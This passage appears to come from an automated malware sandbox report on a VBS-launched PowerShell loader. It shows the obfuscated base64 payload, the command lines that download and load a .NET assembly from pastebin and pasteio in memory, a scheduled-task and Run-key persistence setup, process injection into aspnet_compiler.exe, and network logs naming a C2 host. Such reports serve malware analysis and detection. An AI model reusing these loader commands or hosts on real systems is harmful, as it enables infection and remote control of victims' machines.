g‱Jw‱g‱Cw‱I‱‱k‱G0‱dQB3‱HQ‱a‱‱g‱Cw‱I‱‱n‱GU‱eQBV‱Fc‱TQ‱n‱Cw‱I‱‱k‱HI‱cgBq‱Gg‱bw‱s‱C‱‱Jw‱x‱Cc‱L‱‱g‱Cc‱UgBv‱GQ‱YQ‱n‱C‱‱KQ‱p‱Ds‱';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('‱','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs');powershell -command $KByHL;
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5024
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$rrjho = '01234';$muwth = 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs';[Byte[]] $buofc = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/16APD4C6') ) );[system.AppDomain]::CurrentDomain.Load($buofc).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('li7fniwy6bqx/daolnwod/moc.oietsap//:sptth' , $muwth , 'eyUWM', $rrjho, '1', 'Roda' ));"
                5⤵
                • Blocklisted process makes network request
                • Drops startup file
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2304
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3940
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
                    7⤵
                    • Adds Run key to start application
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1136
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:444
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4272
                • C:\Windows\system32\cmd.exe
                  cmd.exe /c schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f & exit
                  6⤵
                    PID:1068
                    • C:\Windows\system32\schtasks.exe
                      schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f
                      7⤵
                      • Creates scheduled task(s)
                      PID:5076
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\77cc8d160dfa2efa3a75e52a620e3f8a6cc2665e94ed56aa1ddd97a61b59a5d1.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
                    6⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5048
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                    6⤵
                      PID:1532
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                      6⤵
                        PID:840

            Network

            • flag-us
              DNS
              208.194.73.20.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              208.194.73.20.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              pastebin.com
              powershell.exe
              Remote address:
              8.8.8.8:53
              Request
              pastebin.com
              IN A
              Response
              pastebin.com
              IN A
              172.67.34.170
              pastebin.com
              IN A
              104.20.67.143
              pastebin.com
              IN A
              104.20.68.143
            • flag-us
              GET
              https://pastebin.com/raw/16APD4C6
              powershell.exe
              Remote address:
              172.67.34.170:443
              Request
              GET /raw/16APD4C6 HTTP/1.1
              Host: pastebin.com
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:07:41 GMT
              Content-Type: text/plain; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              x-frame-options: DENY
              x-content-type-options: nosniff
              x-xss-protection: 1;mode=block
              cache-control: public, max-age=1801
              CF-Cache-Status: MISS
              Last-Modified: Sat, 01 Jul 2023 01:07:41 GMT
              Server: cloudflare
              CF-RAY: 7dfac0e85eed0b78-AMS
            • flag-us
              GET
              https://pastebin.com/raw/Z5e79zhW
              powershell.exe
              Remote address:
              172.67.34.170:443
              Request
              GET /raw/Z5e79zhW HTTP/1.1
              Host: pastebin.com
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:07:42 GMT
              Content-Type: text/plain; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              x-frame-options: DENY
              x-content-type-options: nosniff
              x-xss-protection: 1;mode=block
              cache-control: public, max-age=1801
              CF-Cache-Status: MISS
              Last-Modified: Sat, 01 Jul 2023 01:07:42 GMT
              Server: cloudflare
              CF-RAY: 7dfac0eeb8020b78-AMS
            • flag-us
              DNS
              pasteio.com
              powershell.exe
              Remote address:
              8.8.8.8:53
              Request
              pasteio.com
              IN A
              Response
              pasteio.com
              IN A
              188.114.96.0
              pasteio.com
              IN A
              188.114.97.0
            • flag-us
              GET
              https://pasteio.com/download/xpQ3RFXbtxKz
              powershell.exe
              Remote address:
              188.114.96.0:443
              Request
              GET /download/xpQ3RFXbtxKz HTTP/1.1
              Host: pasteio.com
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:07:42 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Set-Cookie: ci_session=86be457e832146f09100ab629e70de334b1a4a18; expires=Sat, 01-Jul-2023 03:07:42 GMT; Max-Age=7200; path=/; HttpOnly
              Expires: 0
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              Content-Disposition: attachment; filename=dsadsa.txt
              Vary: Accept-Encoding
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FgUOx%2BzRQNCpKm5gMuwC%2BURAB%2B6CiVr2NyAJ%2Bb2%2BFHHgmBQbW%2BCgNB0duBFC6hcptWqMdXtj197fEAkx7Ca96eisEayMDh47COUAmM2u19ldH4Mvv3472QHogU4ydQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 7dfac0eb6da3422a-AMS
              alt-svc: h3=":443"; ma=86400
            • flag-us
              GET
              https://pasteio.com/download/xqb6ywinf7il
              powershell.exe
              Remote address:
              188.114.96.0:443
              Request
              GET /download/xqb6ywinf7il HTTP/1.1
              Host: pasteio.com
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:07:43 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Set-Cookie: ci_session=03af4eb9c1ad185801004a7d4af982e53ab36668; expires=Sat, 01-Jul-2023 03:07:43 GMT; Max-Age=7200; path=/; HttpOnly
              Expires: 0
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              Content-Disposition: attachment; filename=Untitled.txt
              Vary: Accept-Encoding
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sFQVC3ZUBL3Tncjok9v1gUhQBkPPYiupUahZuSeofezFaUMAr2y6%2FM78KT0a5026Z%2FVgqo6jS9ayJTEW%2FMjrLqJ8WuX2fn7UF3CS5bEnuPDshZ8%2B6dlU%2BM6tLQ8rhg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 7dfac0f1ae77422a-AMS
              alt-svc: h3=":443"; ma=86400
            • flag-us
              DNS
              170.34.67.172.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              170.34.67.172.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              wtools.io
              powershell.exe
              Remote address:
              8.8.8.8:53
              Request
              wtools.io
              IN A
              Response
              wtools.io
              IN A
              104.21.6.247
              wtools.io
              IN A
              172.67.135.130
            • flag-us
              GET
              https://wtools.io/code/dl/bMLn
              powershell.exe
              Remote address:
              104.21.6.247:443
              Request
              GET /code/dl/bMLn HTTP/1.1
              Host: wtools.io
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:07:42 GMT
              Content-Type: text/plain; charset=utf-8;
              Transfer-Encoding: chunked
              Connection: keep-alive
              content-disposition: attachment; filename=d.txt
              x-xss-protection: 1; mode=block
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uIOPUbqxk5698pGyRXmWvRYjuHk65WIHAYX3HULQc8t9TUks%2F7tnc9EA2UdHTCwsLmqlce7zshGJFJsFqtu9sL8lKCCR0f7Qw5Q2X16GtLsBqrfICEAq5V8364I%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 7dfac0f14fc606d2-AMS
              alt-svc: h3=":443"; ma=86400
            • flag-us
              DNS
              95.221.229.192.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              95.221.229.192.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              134.32.126.40.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              134.32.126.40.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              0.96.114.188.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              0.96.114.188.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              55.36.223.20.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              55.36.223.20.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              247.6.21.104.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              247.6.21.104.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              ip-api.com
              aspnet_compiler.exe
              Remote address:
              8.8.8.8:53
              Request
              ip-api.com
              IN A
              Response
              ip-api.com
              IN A
              208.95.112.1
            • flag-us
              GET
              http://ip-api.com/json/
              aspnet_compiler.exe
              Remote address:
              208.95.112.1:80
              Request
              GET /json/ HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
              Host: ip-api.com
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:07:45 GMT
              Content-Type: application/json; charset=utf-8
              Content-Length: 323
              Access-Control-Allow-Origin: *
              X-Ttl: 22
              X-Rl: 42
            • flag-us
              DNS
              crazydns.linkpc.net
              aspnet_compiler.exe
              Remote address:
              8.8.8.8:53
              Request
              crazydns.linkpc.net
              IN A
              Response
              crazydns.linkpc.net
              IN A
              95.214.27.180
            • flag-us
              DNS
              1.112.95.208.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              1.112.95.208.in-addr.arpa
              IN PTR
              Response
              1.112.95.208.in-addr.arpa
              IN PTR
              ip-apicom
            • flag-us
              DNS
              180.27.214.95.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              180.27.214.95.in-addr.arpa
              IN PTR
              Response
            • flag-us
              GET
              https://pastebin.com/raw/16APD4C6
              powershell.exe
              Remote address:
              172.67.34.170:443
              Request
              GET /raw/16APD4C6 HTTP/1.1
              Host: pastebin.com
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:08:03 GMT
              Content-Type: text/plain; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              x-frame-options: DENY
              x-content-type-options: nosniff
              x-xss-protection: 1;mode=block
              cache-control: public, max-age=1801
              CF-Cache-Status: HIT
              Age: 15
              Last-Modified: Sat, 01 Jul 2023 01:07:48 GMT
              Server: cloudflare
              CF-RAY: 7dfac1733f0106da-AMS
            • flag-us
              DNS
              216.74.101.95.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              216.74.101.95.in-addr.arpa
              IN PTR
              Response
              216.74.101.95.in-addr.arpa
              IN PTR
              a95-101-74-216deploystaticakamaitechnologiescom
            • flag-us
              GET
              https://pastebin.com/raw/16APD4C6
              powershell.exe
              Remote address:
              172.67.34.170:443
              Request
              GET /raw/16APD4C6 HTTP/1.1
              Host: pastebin.com
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:09:03 GMT
              Content-Type: text/plain; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              x-frame-options: DENY
              x-content-type-options: nosniff
              x-xss-protection: 1;mode=block
              cache-control: public, max-age=1801
              CF-Cache-Status: MISS
              Last-Modified: Sat, 01 Jul 2023 01:09:03 GMT
              Server: cloudflare
              CF-RAY: 7dfac2e4ef8fb734-AMS
            • flag-us
              GET
              https://pastebin.com/raw/Z5e79zhW
              powershell.exe
              Remote address:
              172.67.34.170:443
              Request
              GET /raw/Z5e79zhW HTTP/1.1
              Host: pastebin.com
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:09:04 GMT
              Content-Type: text/plain; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              x-frame-options: DENY
              x-content-type-options: nosniff
              x-xss-protection: 1;mode=block
              cache-control: public, max-age=1801
              CF-Cache-Status: MISS
              Last-Modified: Sat, 01 Jul 2023 01:09:04 GMT
              Server: cloudflare
              CF-RAY: 7dfac2f08dcdb734-AMS
            • flag-us
              GET
              https://pasteio.com/download/xpQ3RFXbtxKz
              powershell.exe
              Remote address:
              188.114.96.0:443
              Request
              GET /download/xpQ3RFXbtxKz HTTP/1.1
              Host: pasteio.com
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:09:03 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Set-Cookie: ci_session=ab1720ddd537e5dee30497a51dd602e2fe091494; expires=Sat, 01-Jul-2023 03:09:03 GMT; Max-Age=7200; path=/; HttpOnly
              Expires: 0
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              Content-Disposition: attachment; filename=dsadsa.txt
              Vary: Accept-Encoding
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L7QBQUy0N%2BCBDaoHi%2FWLnfrgG6mwofQkYItjUCaFBfNWknEDNdUrwCqgPMtrQt4zo7qk7L5m7OXhfset052wUDws84IYBtNucNy9F0LOrIjG3DSJJrUQI5sHYVjU5g%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 7dfac2e7def10bed-AMS
              alt-svc: h3=":443"; ma=86400
            • flag-us
              GET
              https://pasteio.com/download/xqb6ywinf7il
              powershell.exe
              Remote address:
              188.114.96.0:443
              Request
              GET /download/xqb6ywinf7il HTTP/1.1
              Host: pasteio.com
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:09:05 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Set-Cookie: ci_session=34de8e2d61cb2a1e44d9ffa716c82288d593f48e; expires=Sat, 01-Jul-2023 03:09:05 GMT; Max-Age=7200; path=/; HttpOnly
              Expires: 0
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              Content-Disposition: attachment; filename=Untitled.txt
              Vary: Accept-Encoding
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bgfYpQxuvbWznz0Bh2VIng8qE9Gqj6Y47q8osrfHFe33kCQIsqoRVF1TdCyWRvjivX5cjTtmiZJF2G77Ppvovk6DCKVGdd9tNR2FKUNBf5LdUNzk6lxAkl9y5hLXtw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 7dfac2f339280bed-AMS
              alt-svc: h3=":443"; ma=86400
            • flag-us
              GET
              https://wtools.io/code/dl/bMLn
              powershell.exe
              Remote address:
              104.21.6.247:443
              Request
              GET /code/dl/bMLn HTTP/1.1
              Host: wtools.io
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:09:05 GMT
              Content-Type: text/plain; charset=utf-8;
              Transfer-Encoding: chunked
              Connection: keep-alive
              content-disposition: attachment; filename=d.txt
              x-xss-protection: 1; mode=block
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nYGv0t7CfmIn2aNPlpFsXXwbnOo637EC3%2FXUJDukD7fssfElHQCpKXzz89dwlM3%2FO63Waf4SvcwMV3fufd5wDqLl3pDrXl2tNNYyjz0MiFt2XxA%2FRrERMnhe7ck%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 7dfac2f2c9780a7b-AMS
              alt-svc: h3=":443"; ma=86400
            • flag-us
              DNS
              45.8.109.52.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              45.8.109.52.in-addr.arpa
              IN PTR
              Response
            • flag-us
              GET
              https://pastebin.com/raw/16APD4C6
              powershell.exe
              Remote address:
              172.67.34.170:443
              Request
              GET /raw/16APD4C6 HTTP/1.1
              Host: pastebin.com
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:10:04 GMT
              Content-Type: text/plain; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              x-frame-options: DENY
              x-content-type-options: nosniff
              x-xss-protection: 1;mode=block
              cache-control: public, max-age=1801
              CF-Cache-Status: EXPIRED
              Last-Modified: Fri, 30 Jun 2023 15:47:18 GMT
              Server: cloudflare
              CF-RAY: 7dfac463caf30bba-AMS
            • flag-us
              GET
              https://pastebin.com/raw/Z5e79zhW
              powershell.exe
              Remote address:
              172.67.34.170:443
              Request
              GET /raw/Z5e79zhW HTTP/1.1
              Host: pastebin.com
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:10:06 GMT
              Content-Type: text/plain; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              x-frame-options: DENY
              x-content-type-options: nosniff
              x-xss-protection: 1;mode=block
              cache-control: public, max-age=1801
              CF-Cache-Status: EXPIRED
              Last-Modified: Fri, 30 Jun 2023 08:50:04 GMT
              Server: cloudflare
              CF-RAY: 7dfac46f5cde0bba-AMS
            • flag-us
              GET
              https://pasteio.com/download/xpQ3RFXbtxKz
              powershell.exe
              Remote address:
              188.114.96.0:443
              Request
              GET /download/xpQ3RFXbtxKz HTTP/1.1
              Host: pasteio.com
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:10:04 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Set-Cookie: ci_session=1fb9b7aadc646e7b7e92b6dd71fd47ba8cb41d4b; expires=Sat, 01-Jul-2023 03:10:04 GMT; Max-Age=7200; path=/; HttpOnly
              Expires: 0
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              Content-Disposition: attachment; filename=dsadsa.txt
              Vary: Accept-Encoding
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3yHajzLbSmKTUBU%2Fo1VncXwAxQpXD0dDv08Pc%2FO%2BegamjUoptZsttFZPUQgmpyEXio2N8cogFdEN%2B90t%2F54qS8rYJliJdm2iewe5Q8HkHZftJoNyvbjxV3%2BF9jhSJw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 7dfac4662da206c0-AMS
              alt-svc: h3=":443"; ma=86400
            • flag-us
              GET
              https://pasteio.com/download/xqb6ywinf7il
              powershell.exe
              Remote address:
              188.114.96.0:443
              Request
              GET /download/xqb6ywinf7il HTTP/1.1
              Host: pasteio.com
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:10:06 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Set-Cookie: ci_session=ea9b83495acf6af0541a3c889681b86888ac1e0b; expires=Sat, 01-Jul-2023 03:10:06 GMT; Max-Age=7200; path=/; HttpOnly
              Expires: 0
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              Content-Disposition: attachment; filename=Untitled.txt
              Vary: Accept-Encoding
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RBFddz%2FZuU64DA6G1dFD8zOzpajmks5GWyRTcPZG%2FkbaKhVqQS6RYK%2FIFDKjRHKPNdHR%2FEJwg9AB1VIKpZ%2Fq8AGWKwLNLO0eYR5qUyyV36W1eGbNitWcF2gWV59zRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 7dfac471cfd106c0-AMS
              alt-svc: h3=":443"; ma=86400
            • flag-us
              GET
              https://wtools.io/code/dl/bMLn
              powershell.exe
              Remote address:
              104.21.6.247:443
              Request
              GET /code/dl/bMLn HTTP/1.1
              Host: wtools.io
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sat, 01 Jul 2023 01:10:06 GMT
              Content-Type: text/plain; charset=utf-8;
              Transfer-Encoding: chunked
              Connection: keep-alive
              content-disposition: attachment; filename=d.txt
              x-xss-protection: 1; mode=block
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cQ0BVumU76B96C9yNWxoIbzuKj6znnGCk1%2Bu8PkJpKxlouD9WKp%2B6vFtJX%2FtTHzagJoXNiRgCfj4VI1wpn2kjPbXPDTuXpZ%2B%2BUwKrEQGCM7%2FGZ9yAtKrFsnz9yw%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 7dfac4712d6a1e6d-AMS
              alt-svc: h3=":443"; ma=86400
            • 172.67.34.170:443
              https://pastebin.com/raw/Z5e79zhW
              tls, http
              powershell.exe
              891 B
               4.2kB
               10
              11

              HTTP Request

              GET https://pastebin.com/raw/16APD4C6

              HTTP Response

              200

              HTTP Request

              GET https://pastebin.com/raw/Z5e79zhW

              HTTP Response

              200
            • 188.114.96.0:443
              https://pasteio.com/download/xqb6ywinf7il
              tls, http
              powershell.exe
              9.7kB
               518.2kB
               202
              392

              HTTP Request

              GET https://pasteio.com/download/xpQ3RFXbtxKz

              HTTP Response

              200

              HTTP Request

              GET https://pasteio.com/download/xqb6ywinf7il

              HTTP Response

              200
            • 104.21.6.247:443
              https://wtools.io/code/dl/bMLn
              tls, http
              powershell.exe
              1.8kB
               65.6kB
               31
              53

              HTTP Request

              GET https://wtools.io/code/dl/bMLn

              HTTP Response

              200
            • 208.95.112.1:80
              http://ip-api.com/json/
              http
              aspnet_compiler.exe
              374 B
               672 B
               5
              4

              HTTP Request

              GET http://ip-api.com/json/

              HTTP Response

              200
            • 95.214.27.180:26133
              crazydns.linkpc.net
              aspnet_compiler.exe
              1.6kB
               881 B
               17
              15
            • 172.67.34.170:443
              https://pastebin.com/raw/16APD4C6
              tls, http
              powershell.exe
              726 B
               3.6kB
               8
              7

              HTTP Request

              GET https://pastebin.com/raw/16APD4C6

              HTTP Response

              200
            • 188.114.96.0:443
              pasteio.com
              powershell.exe
              260 B
               5
            • 20.42.65.88:443
              322 B
               7
            • 188.114.97.0:443
              pasteio.com
              powershell.exe
              260 B
               5
            • 209.197.3.8:80
              322 B
               7
            • 172.67.34.170:443
              https://pastebin.com/raw/Z5e79zhW
              tls, http
              powershell.exe
              891 B
               4.2kB
               10
              11

              HTTP Request

              GET https://pastebin.com/raw/16APD4C6

              HTTP Response

              200

              HTTP Request

              GET https://pastebin.com/raw/Z5e79zhW

              HTTP Response

              200
            • 188.114.96.0:443
              https://pasteio.com/download/xqb6ywinf7il
              tls, http
              powershell.exe
              9.8kB
               518.2kB
               204
              392

              HTTP Request

              GET https://pasteio.com/download/xpQ3RFXbtxKz

              HTTP Response

              200

              HTTP Request

              GET https://pasteio.com/download/xqb6ywinf7il

              HTTP Response

              200
            • 104.21.6.247:443
              https://wtools.io/code/dl/bMLn
              tls, http
              powershell.exe
              1.8kB
               65.7kB
               32
              54

              HTTP Request

              GET https://wtools.io/code/dl/bMLn

              HTTP Response

              200
            • 172.67.34.170:443
              https://pastebin.com/raw/Z5e79zhW
              tls, http
              powershell.exe
              937 B
               4.2kB
               11
              11

              HTTP Request

              GET https://pastebin.com/raw/16APD4C6

              HTTP Response

              200

              HTTP Request

              GET https://pastebin.com/raw/Z5e79zhW

              HTTP Response

              200
            • 188.114.96.0:443
              https://pasteio.com/download/xqb6ywinf7il
              tls, http
              powershell.exe
              9.5kB
               517.8kB
               197
              382

              HTTP Request

              GET https://pasteio.com/download/xpQ3RFXbtxKz

              HTTP Response

              200

              HTTP Request

              GET https://pasteio.com/download/xqb6ywinf7il

              HTTP Response

              200
            • 104.21.6.247:443
              https://wtools.io/code/dl/bMLn
              tls, http
              powershell.exe
              1.8kB
               65.7kB
               31
              54

              HTTP Request

              GET https://wtools.io/code/dl/bMLn

              HTTP Response

              200
            • 8.8.8.8:53
              208.194.73.20.in-addr.arpa
              dns
              72 B
               158 B
               1
              1

              DNS Request

              208.194.73.20.in-addr.arpa

            • 8.8.8.8:53
              pastebin.com
              dns
              powershell.exe
              58 B
               106 B
               1
              1

              DNS Request

              pastebin.com

              DNS Response

              172.67.34.170
              104.20.67.143
              104.20.68.143

            • 8.8.8.8:53
              pasteio.com
              dns
              powershell.exe
              57 B
               89 B
               1
              1

              DNS Request

              pasteio.com

              DNS Response

              188.114.96.0
              188.114.97.0

            • 8.8.8.8:53
              170.34.67.172.in-addr.arpa
              dns
              72 B
               134 B
               1
              1

              DNS Request

              170.34.67.172.in-addr.arpa

            • 8.8.8.8:53
              wtools.io
              dns
              powershell.exe
              55 B
               87 B
               1
              1

              DNS Request

              wtools.io

              DNS Response

              104.21.6.247
              172.67.135.130

            • 8.8.8.8:53
              95.221.229.192.in-addr.arpa
              dns
              73 B
               144 B
               1
              1

              DNS Request

              95.221.229.192.in-addr.arpa

            • 8.8.8.8:53
              134.32.126.40.in-addr.arpa
              dns
              72 B
               158 B
               1
              1

              DNS Request

              134.32.126.40.in-addr.arpa

            • 8.8.8.8:53
              0.96.114.188.in-addr.arpa
              dns
              71 B
               133 B
               1
              1

              DNS Request

              0.96.114.188.in-addr.arpa

            • 8.8.8.8:53
              55.36.223.20.in-addr.arpa
              dns
              71 B
               157 B
               1
              1

              DNS Request

              55.36.223.20.in-addr.arpa

            • 8.8.8.8:53
              247.6.21.104.in-addr.arpa
              dns
              71 B
               133 B
               1
              1

              DNS Request

              247.6.21.104.in-addr.arpa

            • 8.8.8.8:53
              ip-api.com
              dns
              aspnet_compiler.exe
              56 B
               72 B
               1
              1

              DNS Request

              ip-api.com

              DNS Response

              208.95.112.1

            • 8.8.8.8:53
              crazydns.linkpc.net
              dns
              aspnet_compiler.exe
              65 B
               81 B
               1
              1

              DNS Request

              crazydns.linkpc.net

              DNS Response

              95.214.27.180

            • 8.8.8.8:53
              1.112.95.208.in-addr.arpa
              dns
              71 B
               95 B
               1
              1

              DNS Request

              1.112.95.208.in-addr.arpa

            • 8.8.8.8:53
              180.27.214.95.in-addr.arpa
              dns
              72 B
               147 B
               1
              1

              DNS Request

              180.27.214.95.in-addr.arpa

            • 8.8.8.8:53
